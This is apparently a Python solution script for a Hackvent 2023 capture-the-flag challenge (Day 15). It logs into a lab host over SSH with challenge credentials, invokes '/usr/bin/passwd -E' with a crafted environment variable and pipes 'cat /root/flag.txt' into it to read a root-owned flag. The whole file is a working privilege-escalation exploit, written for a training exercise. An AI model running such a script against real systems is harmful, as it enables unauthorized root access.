Hackvent_2023/Day 15/exploit.py

import paramiko

HOSTNAME = "04806b1a-dd1f-4eaf-b19d-b6df4db1cce5.rdocker.vuln.land"
USERNAME = "challenge"
PASSWORD = "challenge"

if __name__ == "__main__":
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(HOSTNAME, 22, USERNAME, PASSWORD)
    stdin, stdout, stderr = ssh.exec_command("SALAMI=https://www.youtube.com/watch?v=dQw4w9WgXcQ /usr/bin/passwd -E")
    stdin.write(b"cat /root/flag.txt\n")
    stdin.flush()
    stdin.close()
    flag = stdout.read().split(b"\n")[0].decode()
    print("[+] Flag:", flag)
    ssh.close()